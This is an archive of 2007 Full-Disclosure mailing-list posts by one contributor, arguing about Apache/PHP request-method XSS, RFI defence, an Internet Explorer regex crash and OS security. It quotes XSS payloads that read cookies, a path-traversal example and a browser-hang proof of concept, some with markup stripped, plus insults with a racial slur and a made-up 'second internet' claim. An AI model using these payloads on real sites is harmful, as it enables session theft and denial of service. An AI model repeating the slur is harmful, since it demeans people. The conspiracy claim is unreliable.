Re: [Full-disclosure] Am I missing anything ?

2007-07-24 Thread Kradorex Xeron
Simon and Joey,

Your comments are not contributing anything of value to the list and is 
causing SNR of the list to go down.

I strongly suggest for you to both take your personal banter off-list. I 
suspect that the rest of the list does not want to hear your personal banter 
toward each other.

This is a security list, not a space for your personal bickering. Grow up.

On Monday 23 July 2007 18:48, Simon Smith wrote:
 Right kid... Can we also agree that you are immature? I mean, we can't lay
 this to rest unless we come to a compromise. Frankly, I don't feel that it
 would be a compromise if you didn't come half way in this relationship.

 While we're at it... Lets also agree that you're a coward, probably fat and
 lethargic... With no real friends... Who never really gets laid?

 Yeah I think that about sums it up... ;]

 On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote:
  No, I forgot. I now remember, thank you. As long as we agree that
  you were wrong, I was right, and you are an ignorant jackass who
  may or may not have had sexual relations with the Oreo named KF, I
  see no need for this thread to continue.
  On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED]
  You are right with respect to your RFI comment... But as far as me
  anything, don't count on it. I am after all an ignorant jackass
  On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED]
  But I am right, am I not? Just pointing out what everyone else
  thinking already :)
  Anyway, if you are implying I am immature because of my ad
  please refer to the following:
  You should have learned from KF by now the infosec mantra 'live
  the niggerdong, die by the niggerdong'
  On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith
  Kid, your posts continue to clearly demonstrate your
  Its too bad that you're such a coward man...
  On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED]
  Doesn't RFI stand for remote file inclusion you ignorant
  On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith
  Local and Remote file inclusion, yes, you are actually
  bunch of
  things.. ;)
  On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ
  Hi All,
 Just wondered if I am missing anything important. Am
  to give
  talk on web security.
  Is there any other technique other than the following I have
  about ?
  3)SQL Injection
  4)AJAX/JSON hijacking
  5)HTTP response splitting
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Re: [Full-disclosure] Office 0day

2007-06-25 Thread Kradorex Xeron
On Sunday 24 June 2007 16:19, [EMAIL PROTECTED] wrote:
 I can't give detail here

Isn't  this list called full-disclosure? - in otherwords: If you aren't 
going to disclose anything: DON'T post that you have something. This list 
is designed specifically for disclosing (and discussing on the occasion) 
vulnerabilities, problems, etc to the entire community at once, not just 
selectively who you choose (i.e. who buys your 0day).

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Re: [Full-disclosure] n3td3v says second internet exists

2007-06-16 Thread Kradorex Xeron
Okay, I have a few points I would like to make (assuming if this is true, 
which I doubt as it is technologically possible to properly implement):

1. The Internet is not owned or run by a single government therefore This is 
impossible to implement successfully and properly.The Internet as we know it 
cannot be controlled by a single government. The Internet as we know it is a 
de-centralized entity, with no central network that controls it all.

2. This current Internet (aka The former ARPAnet) has something We like to 
call Redundancy and Since the Internet (ARPAnet) is de-centralized, there 
is no real method of attacking the Internet, you can only attack nodes of 
the internet, as you take down one link, another comes up to service, take 
down that link, and yet another comes about. The Internet is more complex 
than having bunch of home routers linked with single links peered between 
each other.

3. Switching people over and With new protocols - hm.. What could go wrong 
here... people's computers failing to being able to communicate with 
this new Internet because of incompatible protocols as well as operating 
systems... as well as what would be done to prevent 'crap' from the old 
internet from leaking over? 

I suggest stop doning a tin foil hat every time people think of a plan, 
Especially those without a clue (i.e. cororate execs and government)

My appologies to the list for increasing the noise end of the SNR of the list.

On Saturday 16 June 2007 16:18, HACK THE GOV wrote:
  secret information regarding second internet  Reader post by: n3td3v
 Posted on: June 15, 2007, 6:14 AM PDT
 Story: Coming attractions for history's first

 the government are building a second internet incase this one goes down.

 not only is the second internet being built incase the first one gets
 attaced, infact the government plan to eventually switch everyone over to
 the second internet because its being built with security in mind.

 the problem with the first internet is, its not very secure and from the
 governments point of view not very well designed for counter-terrorism
 eaves dropping.

 new protocols and processes are being developed on the new internet which
 will be exclusively used by the u.s government until the roll out in 20 to
 30 years time, although the u.s government will cut that public release
 timeline if a major breakdown of the internet occurs through cyberattacks.

 in high level meetings with corporate america officials, technical details
 of how to let corporate security experts switch over to the highly
 classified second internet project in time of national emergency was

 all parties involved in talks have signed documents to stop them talking
 about it in pub;lic, although details of the second internet have been
 obtained by international hackers, who have become firmilar with the

 documents containing the plans for the second internet were downloaded off
 government computer networks by underground hackers, and therefore the
 information regarding the second internet project have been leaked.

 it is unclear how far on in development the project is, due to the papers
 obtained by illegal authorised entry into u.s government networks was not
 marked as the same time period as when the papers of the plans were
 obtained by the illegal means of international hackers.

 in private the government are trying not to talk about cyber attacks too
 much so not to over talk the risk to national government and e-commerce
 interests, but in truth they are only too aware of the threat to their own
 communications and anti missle systems, therefore a second highly
 classified internet was advised by top level whitehosue advisors who have
 consulted with cyber security experts in classified meetings with
 government officals.

 the saftey net known as the second internet may save america from certain
 national economic disaster and attacks to u.s army defense systems in a
 time of real world war when nuclear and cyber attacks are likely to happen.



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Re: [Full-disclosure] You shady bastards.

2007-06-08 Thread Kradorex Xeron
On Friday 08 June 2007 07:12, Thierry Zoller wrote:
 Dear List,

 I know we have a World Police but luckily we have no World laws, how
 about some of you stick to things your supposed to be able to do,
 security, coding whatever and leave law to those that practise it ?

 I have yet to see a lawyer good at sec, it depends on
 - legislation the company resides in
 - the contract
 - the form of the message

 In luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL
 are not allowed to be viewed by the company, ALSO as email. Write it
 in the subject line.

To risk breaking my keeping off legal grounds (note: IANAL)

With your logic, someone could bring in their home computer, hook it into the 
network, upload their private files to the server and name a 
directory CONFIDENTIAL and shove their personal home files in it and nobody 
is allowed to see what's in it to determine if it's supposed to be there or 
not because it's named CONFIDENTIAL, thus the person gets free space on the 
COMPANY server to do whatever they please, even after they leave the company.

To be brutally honest, Those marked CONFIDENTIAL emails stick about as much 
as those lines some corperations make their staff have at the bottom of 
emails that say essentially If you received this email in error, delete it 
immediately as it is confidential. It is illegal for you to have this email 
if it isn't reguarding you.

Is it me or are too many people expecting security by good will nowadays?

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Re: [Full-disclosure] You shady bastards.

2007-06-08 Thread Kradorex Xeron
On Friday 08 June 2007 08:04, Thierry Zoller wrote:
 Dear Kradorex,
 Oh now canada enters the game, somebody from russia pleae also comment
 on Luxemburgish law, aeessome.

 It is not logic, it's law (read: positive law). It applies to Mail
 only, get over it. It gives you legal ground to sue. Can you grasp
 the concept here?

Okay, if you want to go about it that way and use the law in this game:..

In that event: It should therefore be the user's responsibility alone, nobody 
else's reguardless of departure reason (Fired, quit, etc) to tell the people 
that the specified mailbox will be terminated. Furthermore, mail should be 
dropped upon employee's depature, reguardless if the user made those 
statements to those who he/she communicates with, as there would be nobody 
else that has legal qualification to touch mail sent to that box, therefore 
anyone not contacted who continues to send mail to the defunct address, too 
bad. They may get notified later on, they may not, just continue dropping the 

As long as the caretaking of defunct mailboxes is under someone else's 
control, there will be snooping going on

So best option: Terminate account, delete all mail in the box and being 
received for then on, have nobody take care of any defunct mailboxes. That 
way, nobody could be exposed to privacy invasion lawsuits.

End of Problem.

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Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread Kradorex Xeron
On Wednesday 06 June 2007 09:47, H D Moore wrote:

 Some friends and I were putting together a contact list for the folks
 attending the Defcon conference this year in Las Vegas. My friend sent
 out an email, with a large CC list, asking people to respond if they
 planned on attending. The email was addressed to quite a few people, with
 one of them being David Maynor. Unfortunately, his old SecureWorks
 address was used, not his current address with ErrattaSec.

 Since one of the messages sent to the group contained a URL to our phone
 numbers and names, I got paranoid and decided to determine whether
 SecureWorks was still reading email addressed to David Maynor. I sent an
 email to David's old SecureWorks address, with a subject line promising
 0-day, and a link to a non-public URL on the web server
 (via SSL). Twelve hours later, someone from a Comcast cable modem in
 Atlanta tried to access the link, and this someone was (confirmed) not
 David. SecureWorks is based in Atlanta. All times are CDT.

 I sent the following message last night at 7:02pm.

 From: H D Moore hdm[at]
 To: David Maynor dmaynor[at]
 Subject: Zero-day I promised
 Date: Tue, 5 Jun 2007 19:02:11 -0500
 User-Agent: KMail/1.9.3
 MIME-Version: 1.0
 Content-Type: text/plain;
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Message-Id: 200706051902.11544.hdm[at]
 Status: RO
 X-Status: RSC

 Approximately 12 hours later, the following request shows up in my Apache
 log file. It looks like someone at SecureWorks is reading email addressed
 to David and tried to access the link I sent: - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz
 HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
 AppleWebKit/419 (KHTML, like Gecko) Safari/419.3

 This address resolves to:

 The whois information is just the standard Comcast block boilerplate.


 Is this illegal? I could see reading email addressed to him being within
 the bounds of the law, but it seems like trying to download the 0day
 link crosses the line.

 Illegal or not, this is still pretty damned shady.



I will seldom touch on the legal side but I have a possible scenario:

-- If David is no longer at that address, it could be said that his mail 
account was taken down and the mail sent ended up in a possible catch all 
box, perhaps someone at SecureWorks was looking through the said catchall 
mailbox for any interesting mail sent to the domain (i.e. to 
old employees) - It's quite common for companies and organizations to monitor 
former employee mailboxes in the event anyone that doesn't have any new 
contact information to be able to still get somewhere with the old address. 
And them being a security organization, maybe they proceeded to investigate 
the link sent.

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Re: [Full-disclosure] Hashes

2007-05-29 Thread Kradorex Xeron
To what? Your dog? The universe? an MP3 you downloaded? a program?


On Tuesday 29 May 2007 03:17, I)ruid wrote:
 SHA1:   80dbb7a782da0d2c09dc4d67750575c08b61e9ac
 SHA256: da62ba72af7b3a4d886ab61cea6d2177139be67ff564826ab3fd6e09b56ebe06

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Re: [Full-disclosure] How to protect RFI ??

2007-05-26 Thread Kradorex Xeron
On Saturday 26 May 2007 16:37, Mark Sec wrote:
 does any1 how to protect about RFI (Remote file inclusion), and what i need
 to see over php files ?


On a script basis:
1. Parse input for validity
2. Don't allow urls to be unconditionally accepted
3. Don't allow XSS bymaking sure input is genuine and doesn't contain extra 
characters than are expected.

On a server-basis:
If it is a server that will be hosting users, I suggest deactivating RFI 
all-together as users may install scripts that don't check input, 
Furthermore, disable sockets to prevent users from starting up their 
own services and/or backdoors, even though there may not be privledged 
access, if a user gets a shell of some sort, they may be able to get your 
system roped into a botnet or filestore under the HTTPD's account.

However, if it will only be hosting you, then it may be acceptable to leave 
the default config and make sure scripts behave on a per-script basis as RFI 
may be eventually useful for you if you parse the include input.

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Re: [Full-disclosure] WordPress Community Vulnerable

2007-05-24 Thread Kradorex Xeron
On Thursday 24 May 2007 12:57, Paul Schmehl wrote:
 --On Thursday, May 24, 2007 09:44:02 -0500 Steven Adair

  So do you think his two WordPress blogs (I am assuming here..looks a lot
  like WP, but I'm not pounding out GET requests to verify) were included
  in this survey that was done?  I wonder if he's running a safe version?
  And as mentioned in one of his blog comments, version reporting isn't
  always reliable and patches that did not change the extractable version
  number could have also been applied.
  In any event, I think WordPress has increasingly become more secure. 
  It's had a small rash of issues a few months back ranging from SQL
  injection to someone actually backdooring the source, but it's grown up
  quite a bit.  I think someone would be hard pressed to actually come up
  with the Month of Wordpress bugs.  The majority of all other recently
  reported issues have all from third party add-ons that aren't actually a
  part of WordPress.

 Yes, but the point of his post isn't that *Wordpress* is insecure.  It's
 that blog owners are not updating their software to maintain security.
 While anyone in IT would go doh!, many in the real world might be
 surprised that the software has to be regularly updated and vigorously
 maintained to ensure ongoing security.

Probably because alot of  the said blog owners that neglect upgrading are like 
any regular computer user, they just want something to work, and if it works, 
they assume it's okay, therefore, they ignore security upgrades since it 
would require additional work for something that is not visable to them, as 
they go by the premise, if it has no new features, Why upgrade?

We all know (at least I hope) that security upgrades are something worthwhile 
because we can see the difference (we can test the exploit on the new version 
to see if it's patched or nott), whereas a regular user would not.

 This isn't exactly news for us, but it may well be for the blogosphere in

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Re: [Full-disclosure] Linux big bang theory....

2007-05-15 Thread Kradorex Xeron
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote:
  scott wrote:
   Evidently you need more experience in security research:
   I believe this should dispel your myth about OSX's invulnerability.
   Really...did you honestly believe it was invincible?

 Of course no operating system is invincible when you have full access
 to the machine. You could just delete all of the files yourself.
 OSX isn't using all of the tricks like windows does to try and hide
 executables throughout dlls and other such files. Ever heard of dll
 hell? No wonder these machines are broken into so often.
 The point is what would you rather have 1000 windows machines 1000
 linux machines or 1000 OSX machines? If you wanted to not be infected
 I'd be taking the OSX machines for sure, otherwise if you want to get
 these kind of kernel rootkit tricks of JOquendo or something like
 rhosts for your life then you would choose one of the linux
 What next are you going to virtualise this and run them all on the
 same host? Frankly, it really doesnt matter what your guest server is
 running if your host is broken :-)

Your points are moot.

The only reason OSX is so good security wise, is because the OS doesn't give 
open administrator access to the users, preventing the dumbness of the 
uninteligent users from screwing up the OS in the conventional sense, I bet 
the instant you introduce administrative privs into OSX, you'd get security 
breaches galore. 

To put it bluntly: OSX Treats it's users like they're in a playpen, trying not 
to expose the users to the real world

It's the DUMB USERS who are the security risks. NOT the OS the majority of the 
time. If you left a Windows machine running, with a competent user, it will 
have a lower risk of becoming infected/rooted  than if you parked a clueless 
user in front of the machine.

Same with Linux, park a stupid superuser in front of the machine, you will of 
coruse you'll get stupid results. However, if you get a competent superuser 
that only uses root for admin tasks only and doesn't do anything 
exparamental under root on a production machine, as well as not give users 
any more permission than they need, you'd be set.

So what are we trying to do? protect the OS from what? or protect the users 
from making idiotic decisions that will screw up their boxes?

Remember folks: Computers only operate as good as those who operate them.

 Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi

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Re: [Full-disclosure] Linux big bang theory....

2007-05-14 Thread Kradorex Xeron
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote:
  scott wrote:
   Evidently you need more experience in security research:
   I believe this should dispel your myth about OSX's invulnerability.
   Really...did you honestly believe it was invincible?

 Of course no operating system is invincible when you have full access
 to the machine. You could just delete all of the files yourself.
 OSX isn't using all of the tricks like windows does to try and hide
 executables throughout dlls and other such files. Ever heard of dll
 hell? No wonder these machines are broken into so often.
 The point is what would you rather have 1000 windows machines 1000
 linux machines or 1000 OSX machines? If you wanted to not be infected
 I'd be taking the OSX machines for sure, otherwise if you want to get
 these kind of kernel rootkit tricks of JOquendo or something like
 rhosts for your life then you would choose one of the linux
 What next are you going to virtualise this and run them all on the
 same host? Frankly, it really doesnt matter what your guest server is
 running if your host is broken :-)

Your points are moot.

The only reason OSX is so good security wise, is because the OS doesn't give 
open administrator access to the users, preventing the dumbness of the 
uninteligent users from screwing up the OS in the conventional sense, I bet 
the instant you introduce administrative privs into OSX, you'd get security 
breaches galore. 

To put it bluntly: OSX Treats it's users like they're in a playpen, trying not 
to expose the users to the real world

It's the DUMB USERS who are the security risks. NOT the OS the majority of the 
time. If you left a Windows machine running, with a competent user, it will 
have a lower risk of becoming infected/rooted  than if you parked a clueless 
user in front of the machine.

Same with Linux, park a stupid superuser in front of the machine, you will of 
coruse you'll get stupid results. However, if you get a competent superuser 
that only uses root for admin tasks only and doesn't do anything 
exparamental under root on a production machine, as well as not give users 
any more permission than they need, you'd be set.

So what are we trying to do? protect the OS from what? or protect the users 
from making idiotic decisions that will screw up their boxes?

Remember folks: Computers only operate as good as those who operate them.

 Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi

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Re: [Full-disclosure] Linux big bang theory....

2007-05-11 Thread Kradorex Xeron
On Thursday 10 May 2007 19:43, KJKHyperion wrote:
 J. Oquendo wrote:
  KJKHyperion wrote:
  why, Windows machines of course, I'm an attacker, not a fool! If you
  were a terrorist, what would you rather do?
  Crash the Twin Towers
  Crash the dollar
  There is no such thing as an attacker. All actions, even such an
  individual's, are driven by economical considerations.
  With this said, if I were an attacker with economics in mind
  why would I want to target a machine which has X amount of
  vendors sifting through the much of malware and viruses when
  I could spawn off an semi undetectable program and KEEP IT
  THERE without having to wait for the next best thing.

 So many misconceptions, so little time.

 First of all, I meant economical in not just a monetary sense, but the
 wider sense of balancing conflict in everyone's interest. And well, I
 got the impression you were thinking of outlandish lose-lose (hence
 anti-economical) scenarios where some loose cannon shuts down the whole
 internet, but on second thought I might have been wrong on that account.
 The idea was that, as effective an enemy-killer crashing the dollar
 would be, it would prove counterproductive, damaging irreparably the
 very currency that puts bread on your table and AK-47 on your shoulder.
 So a purely economical evaluation will bring you to choose, instead, the
 option causing the lesser evil (i.e. the virtual death of the airline
 terrorism market).

 Second, don't kid yourself, the market of security suites for Windows
 is, at best, an open-air fish marketplace (a terrible stink, a lot of
 yelling and products with an inherently short freshness timespan the
 first similarities that come to mind, but I'm sure the mental picture
 will evoke you many others).

 I have written Windows attack software for a living, and there's one
 thing I can write down and undersign in my own blood: Windows cannot be
 secured. Which is very bad news for the whole industry, Windows being
 the system with the highest security/feature richness ratio, or in other
 words the culmination of the state of the art of software engineering as
 we know it. We lack the semantic tools to even express *what* Windows
 does, much less how, much less to tell right from wrong

 [The feeble-minded, confronted with this, retreat in the virtualization
 hugbox, forgetting the historic lesson that the Titanic sank because the
 flooding bypassed the (insufficiently fine-grained, at that) waterproof
 compartments by reaching *over* them -- and let's leave it at that,
 before runaway metaphorization makes me say something about how Leonardo
 Di Caprio fits that I will regret]

 There is nothing, absolutely nothing you can do to isolate applications,
 or tell malicious from normal behavior. Hell, you can hardly tell apart
 applications from each other. An application is often just an EXE, but
 sometimes it's an EXE and a bunch of DLLs, and sometimes one of the DLLs
 is loaded in all active processes, and sometimes the EXEs are two or
 more, and sometimes a driver is thrown in the mix, and yet sometimes all
 you have is a single DLL, a DLL that, sometimes, must *necessarily* be
 loaded at random times in an arbitrary process (see: IMEs).

 Not that it matters at all, since the biggest names in security suites
 fail even the most basic, trivial tests (god is my witness in how often
 I overengineered some protection routine, only to discover that
 expensive security suites that shall go unnamed didn't notice the whole
 trojan in the first place), but it's kind of comforting to know that the
 problem is unsolvable in principle, now isn't it?

 So stop shelling out money to the snake oil salesmen or even giving them
 any credit. When humanity's flagship software product is in such a sorry
 state, you know there is nothing a random moron like you can do. Let the
 scientists discover the obvious, let the engineers put it in practice,
 and until then, for the love of god and all that is holy, _just_ _don't_

 [Microsoft being Microsoft, the most important software engineering
 proof-of-concept, ever, they have developed will probably become a
 product in ten years from now, if ever, be a huge flop at it and be
 forgotten soon. It's called Singularity, it's an operating system
 99.999% based on .NET, it will make your CPU simpler and faster and your
 software safer, it's sort of like what Inferno would be if it was
 actually meant to be used by human beings, *and* if your irrational
 racist hate of .NET or other kind of short-sightedness makes it seem any
 less than the... singularity that will take the world by storm and
 change it forever I see it as, *then* to me you are dead from the
 inside; for more

  And if you think for a second that Boohoo Linux users are more inclined
   to be security conscious then you are the fool here.

 Haha, yes they are, according to their self-assessment. As for 

Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-25 Thread Kradorex Xeron
On Wednesday 25 April 2007 05:35, Vincent Archer wrote:
 On Tue, 2007-04-24 at 20:03 +0300, عبد الله احمد عنان wrote:
  This is a case of poor-programming, on the script coder's part, it is
  not so
  much a vunerability.

 In that case, nobody's talking about vulnerabilities on this list, only
 poor programming. :)

Vulnerabilities are results of poor programming.

 The problem in here is that the programmer assumes that the variables
 do have a proper value checking done prior to handling off to the script
 engine. HTTP_METHOD is well defined. One would assume apache has
 validated the method somehow.

If you properly code the scripts, Apache's acceptance of misc data in the 
method field is not a vulnerability, it is a feature that could be used to 
make that field extensible with minimal effort. i.e. a script could be 
designed to send out data based on different methods not listed in the RFC.

 Unfortunately, this assumption was flawed.

  That variable only contains what it is sent by apache. it doesn't
  parse it.
  nor is it supposed to.

 However, it (apache) should perform integrity checks, because it has the
 capacity to do so.

True. but Apache should not facilitate lazy programming on script programmers 
part, the more you baby sit people, the more they will rely on that 
babysitting and not do it for themselves because they will inherently assume 
that they have a 'safety net', thus if the script is run on a server without 
that safety net THAT server gets labeled as vunlnerable when without that 
script the server is not vulnerable.

What are we going to do next? get the HTTPD to valadate the URL-based queries 
(i.e. script.php?var=value) to prevent unintended input 
(i.e. viewfile.php?file=../../../file )? This is a SCRIPT problem. not a 
problem with the HTTPD. 

  This CAN be a vulnerability with individual scripts, however, it is
  not a vuln
  with PHP or Apache.

 Not with PHP. But I would agree with the original programmer that apache
 is in fault here. Apache should have done the expected work, and
 validated that the request was standards-compliant. It didn't, and that
 opens up a huge chasm in which plenty of problems, vulnerabilities and
 others, may hide.

From RFC 2616 Section 5.1.1:
The list of methods allowed by a resource can be specified in an Allow header 
field (section 14.7). The return code of the response always notifies the 
client whether a method is currently allowed on a resource, since the set of 
allowed methods can change dynamically. 

The standards don't say anything about a static list of methods being 
required. so Apache is compliant there. It is a per-script problem for not 
parsing the raw data provided to the script properly.


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Re: [Full-disclosure] OpenSSH - System Account Enumeration if S/Key is used

2007-04-25 Thread Kradorex Xeron
On Wednesday 25 April 2007 15:49, Knud Erik Højgaard wrote:
  But opie not that cool nonetheless, for example there is an
  off-by-one in accessfile.c

 lol stop disclosing 0day

Wouldn't that defeat the purpose of this list?

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Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
That would severely cut most extensibility and require further implementations 
to be hardcoded, thus limiting apache's modular nature.

The original RFC would be insufficient for it's list as there are modules such 
as webdav (as in the previous example) that add to that list of methods

Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly 
extensible, sure, if it WAS a basic one, I could see limiting that list, but 
it's quite advanced and modular in design.

On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote:
 I think that server should have a list of valid requests. In fact
 Apache warns you sometimes that valid requests are:
 GET/POST/TRACE/OPTIONS. The solution that it just accepts everything
 as request and protocol makes no sense. What kind of protocol is
 Regards Michal.

 On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote:
  Michal Majchrowicz wrote:
   I think now we can classify this as flaw in Apache. It accepts
   requests that simply make no sense. Take a look at this example:
   scriptalert(document.cookie);/script /test.php
   In some circumstances it may cause XSS vulnerability:
  As Kradorex Xeron said, that's a flaw in the script. Apache needs
  to let arbitrary verbs through to the PHP (or other server extension)
  otherwise tools like webdav that require additional verbs could not
  be implemented. It is possibly arguable that it should restrict the
  verbs to a single alphanumeric string, but it certainly can't be
  counted on to be just GET/POST etc.
   I am now investigating other possible attacks.
   Regards Michal Majchrowicz.
   Full-Disclosure - We believe in it.
   Hosted and sponsored by Secunia -
  Richard Moore, Principal Software Engineer,
  Westpoint Ltd,
  Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
  Tel: +44 161 237 1028
  Fax: +44 161 237 1031

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Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
That would severely cut most extensibility and require further implementations 
to be hardcoded, thus limiting apache's modular nature.

The original RFC would be insufficient for it's list as there are modules such 
as webdav (as in the previous example) that add to that list of methods

Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly 
extensible, sure, if it WAS a basic one, I could see limiting that list, but 
it's quite advanced and modular in design.

On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote:
 I think that server should have a list of valid requests. In fact
 Apache warns you sometimes that valid requests are:
 GET/POST/TRACE/OPTIONS. The solution that it just accepts everything
 as request and protocol makes no sense. What kind of protocol is
 Regards Michal.

 On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote:
  Michal Majchrowicz wrote:
   I think now we can classify this as flaw in Apache. It accepts
   requests that simply make no sense. Take a look at this example:
   scriptalert(document.cookie);/script /test.php
   In some circumstances it may cause XSS vulnerability:
  As Kradorex Xeron said, that's a flaw in the script. Apache needs
  to let arbitrary verbs through to the PHP (or other server extension)
  otherwise tools like webdav that require additional verbs could not
  be implemented. It is possibly arguable that it should restrict the
  verbs to a single alphanumeric string, but it certainly can't be
  counted on to be just GET/POST etc.
   I am now investigating other possible attacks.
   Regards Michal Majchrowicz.
   Full-Disclosure - We believe in it.
   Hosted and sponsored by Secunia -
  Richard Moore, Principal Software Engineer,
  Westpoint Ltd,
  Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
  Tel: +44 161 237 1028
  Fax: +44 161 237 1031

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Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
That would severely cut most extensibility and require further implementations 
to be hardcoded, thus limiting apache's modular nature.

The original RFC would be insufficient for it's list as there are modules such 
as webdav (as in the previous example) that add to that list of methods

Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly 
extensible, sure, if it WAS a basic one, I could see limiting that list, but 
it's quite advanced and modular in design.

On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote:
 I think that server should have a list of valid requests. In fact
 Apache warns you sometimes that valid requests are:
 GET/POST/TRACE/OPTIONS. The solution that it just accepts everything
 as request and protocol makes no sense. What kind of protocol is
 Regards Michal.

 On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote:
  Michal Majchrowicz wrote:
   I think now we can classify this as flaw in Apache. It accepts
   requests that simply make no sense. Take a look at this example:
   scriptalert(document.cookie);/script /test.php
   In some circumstances it may cause XSS vulnerability:
  As Kradorex Xeron said, that's a flaw in the script. Apache needs
  to let arbitrary verbs through to the PHP (or other server extension)
  otherwise tools like webdav that require additional verbs could not
  be implemented. It is possibly arguable that it should restrict the
  verbs to a single alphanumeric string, but it certainly can't be
  counted on to be just GET/POST etc.
   I am now investigating other possible attacks.
   Regards Michal Majchrowicz.
   Full-Disclosure - We believe in it.
   Hosted and sponsored by Secunia -
  Richard Moore, Principal Software Engineer,
  Westpoint Ltd,
  Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
  Tel: +44 161 237 1028
  Fax: +44 161 237 1031

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Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
This isn't only a problem with that specific variable, it is also a problem 
with any user-defined variable, i.e.

echo $_GET['page'];
can be XSS'd with script.php?page=bblah/b


echo htmlentities($_GET['page']);
is much harder to exploit to inject malicious code.

I beleive the following: If your program/script accepts any user input, never 
assume something else will block the exploit of your program, always 
impliment sanity checks, and/or strip  nonsense out of the input.

On Monday 23 April 2007 18:21, Michał Majchrowicz wrote:
 I agree. But (as a programmer) would you assume that there can be such
 things in the REQUEST_METHOD? The flaw is that Apache accepts anything
 after the valid request i.e. GET. There should be an error the the
 request was not correct.
 Regards Michal.

 On 4/24/07, Kradorex Xeron [EMAIL PROTECTED] wrote:
  This is a case of poor-programming, on the script coder's part, it is not
  so much a vunerability.
  That variable only contains what it is sent by apache. it doesn't parse
  it. nor is it supposed to. If you want to ensure there is no XSS going
  on, parse the variable, escape characters, etc as it IS user input.
  This CAN be a vulnerability with individual scripts, however, it is not a
  vuln with PHP or Apache.
  On Monday 23 April 2007 17:31, Michal Majchrowicz wrote:
   There exist a flaw in a way how Apache and php combination handle the
   $_SERVER array.
   If the programmer writes scrip like this:
   He will assume that REQUEST_METHOD can only by: GET,POST,OPTIONS,TRACE
   and all that stuff. However this is not true, since Apache accepts
   requests that look like this:
   GETscriptalert(document.coookie);/script /test.php HTTP/1.0
   And the output for this would be:
   Of course it is hard to exploit (I think some Flash might help ;)) and
   I don't know if it is exploitable at all. But programmers should be
   warned about this behaviour. You can't trust any  variable in the
   $_SERVER table!
   Regards Michal Majchrowicz.
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Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-23 Thread Kradorex Xeron
This is a case of poor-programming, on the script coder's part, it is not so 
much a vunerability.

That variable only contains what it is sent by apache. it doesn't parse it. 
nor is it supposed to. If you want to ensure there is no XSS going on, parse 
the variable, escape characters, etc as it IS user input.

This CAN be a vulnerability with individual scripts, however, it is not a vuln 
with PHP or Apache.

On Monday 23 April 2007 17:31, Michal Majchrowicz wrote:
 There exist a flaw in a way how Apache and php combination handle the
 $_SERVER array.
 If the programmer writes scrip like this:
 He will assume that REQUEST_METHOD can only by: GET,POST,OPTIONS,TRACE
 and all that stuff. However this is not true, since Apache accepts
 requests that look like this:
 GETscriptalert(document.coookie);/script /test.php HTTP/1.0
 And the output for this would be:
 Of course it is hard to exploit (I think some Flash might help ;)) and
 I don't know if it is exploitable at all. But programmers should be
 warned about this behaviour. You can't trust any  variable in the
 $_SERVER table!
 Regards Michal Majchrowicz.

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Re: [Full-disclosure] Internet Explorer Crash

2007-04-18 Thread Kradorex Xeron
This also works under Konqueror.

There should be an implimentation on ALL browsers that a loop such large is 
unacceptable and refuse to even run it. There is no viable reason for a 
client-side to run a loop through so many itterations.

This DoS technique could be abused and  iframes with the code could be 
embedded within popular websites, effectively causing a denial of service to 
that specific site.

On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
 Product: Internet Explorer Version 7.0.5730.11
 Impact: Browser crash possibly more
 Author: Jesus Oquendo
 echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

 Why bother? Who doesn't know what Internet Explorer and Microsoft are.

 IE 7 is vulnerable to a script which causes the browser to hang. The
 memory and CPU usage go through the roof. Originally the script caused
 (and still causes) Safari and Konqueror to crash.

 Stop using Microsoft products or deal with a new advisory every other

 IV. Proof

 V. Code

 $ more /stupidInternetExploder.html


 var reg = /(.)*/;

 var z = 'Z';
 while (z.length =




999) z+=z; var boum = reg.exec(z);



 J. Oquendo
 sil . infiltrated @ net

 The happiness of society is the end of government.
 John Adams

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Re: [Full-disclosure] Another XSS vulnerability in Italian provider

2007-03-29 Thread Kradorex Xeron
They probably need to redo their entire site's scripts, I wouldn't doubt 
there's a few more exploits in there somewhere. -- 2+ exploits within one 
site in one month is pretty sad.

On Wednesday 28 March 2007 12:17, LK wrote:
 After the report of Rosario Valotta on this ML, another XSS vulnerability
 has been found on, one of the most important italian ISP

 Nothing more than a trivial error but, since staff used the
 printed media to inform that Rosario's find was just a spot issue, it is
 important to demonstrate that this kind of errors are quite more
 widespread and to let the Libero staff and management realize that a
